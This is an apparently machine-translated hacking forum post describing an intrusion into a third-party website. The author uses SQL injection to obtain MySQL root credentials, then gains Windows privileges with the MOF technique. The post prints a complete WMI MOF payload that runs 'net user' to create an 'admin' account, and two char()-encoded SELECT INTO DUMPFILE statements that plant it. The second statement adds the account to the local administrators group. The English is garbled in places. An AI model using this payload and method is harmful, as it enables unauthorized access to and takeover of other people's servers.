sweep to the injection of a station
<ignore_js_op>
in Havij, get the database password saved by MySQL library in MySQL database:
<ignore_js_op>
sometimes found 1.15 version of the best use, the most stable, although the speed is a bit slow.
and put it in the jar and let the oil break.
<ignore_js_op>
thank mr.lu. By the way, cmd5 even a root charge ...
While waiting for the password to crack out of the way to nmap a bit
<ignore_js_op>
The accidental discovery Port changed to 1126, saving a lot of time for the back.
Try it out as usual .
<ignore_js_op>
In the Last post there is a friend asked this software is what, I use is navicat, feel very useful
now the conventional idea is to get the absolute path, write a pony, and then further penetrate.
but the site does not have a path to see the path of MySQL
with SELECT @ @basedir; commands can be seen;
<ignore_js_op>
the path of the site is probably about the same, too lazy a try, the recent MOF power is quite fire, the last failure of a once, this time to try again.
MOF a lot of popular science, we are interested to see the network disk link two, very detailed, we learn together;
http://pan.baidu.com/share/link?shareid=438074&uk=101689864
http://pan.baidu.com/share/link?shareid=438077&uk=101689864The MOF file contents are:
- #pragma namespace ("\\\\.\\root\\subscription")
- Instance of __EventFilter as $EventFilter
- {
- Eventnamespace = "root\\cimv2";
- Name = "FiltP2";
- Query = "SELECT * from __InstanceModificationEvent"
- "Where targetinstance Isa \" Win32_localtime\ ""
- "And Targetinstance.second = 5";
- QueryLanguage = "WQL";
- };
- Instance of Activescripteventconsumer as $Consumer
- {
- Name = "ConsPCSV2";
- Scriptingengine = "JScript";
- ScriptText =
- "var WSH = new ActiveXObject (\" Wscript.shell\ ") \nwsh.run (\" Net.exe user admin admin/add\ ")";
- };
- Instance of __filtertoconsumerbinding
- {
- Consumer = $Consumer;
- Filter = $EventFilter;
- };
Copy Code
In the absence of a horse, can not follow the net in the words of the first to pass a MOF up, I write directly once.
First try to directly write the original statement, the hint failed, the reason is that there are many "; enter" symbols in the statement.
Then you want to convert to a 16 or ASC code.
Try the 16 binary first.
Wait for long time what or landing not up, give up, instead of ASC code, with the SQL statement:
- Select char ( 35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98 , 115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,11 6,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101 , 110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97 , 109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,11 6,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,1 10,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,1 10,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,3 2,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32 , 32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,9 7,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114 , 32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,6 7,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105 , 112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,3 2,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108 , 108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,117,115,101,114,32,97,100,109,105,110 , 32,97,100,109,105,110,32,47,97,100, 100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114 , 84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101 , 114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101 , 110,116,70,105,108,116,101,114,59,13,10,125,59) into dumpfile ' c:/windows/system32/wbem/mof/ Nullevt.mof ';
Copy Code
The effect is to add a user admin password admin;
After waiting for 5 seconds, the login box prompts from
<ignore_js_op>
Become a
<ignore_js_op> [Size=0.83em]uploaded 17 hours ago
Download Accessories [Size=0.83em] (51.04 KB)
This time to realize a problem, the above statement only added users, forgot to upgrade to the administrator ...
All right, write it again. MOF
- Select char ( 35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98 , 115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,11 6,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101 , 110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97 , 109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,11 6,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,1 10,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,1 10,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,3 2,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32 , 32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,9 7,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114 , 32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,6 7,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105 , 112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,3 2,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108 , 108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,108,111,99,97,108,103,114,111,117,112 , 32, 97,100,109,105,110,105,115,116,114,97,116,111,114,115,32,97,100,109,105,110,32,47,97,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116 , 97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,10 3,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32 , 32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) into dumpfile ' C:/windows/system32/wbem/mof/nullevt.mof ';
Copy Code
OK, so it went in smoothly;
<ignore_js_op>
Let's study it one more time. Add Administrator try
Now by default it will be added to the user 5s once, the workaround is:
The first net stop WinMgmt stops the service,
Second Delete folder: C:\WINDOWS\system32\wbem\Repository\
Third net start WinMgmt startup service
There are other ways to write in the file of the net disk.
All the way looks smooth, because the last time I studied this. This time I wrote it in more detail.
A detailed description of the MySQL Remote MOF power utilization method without shell case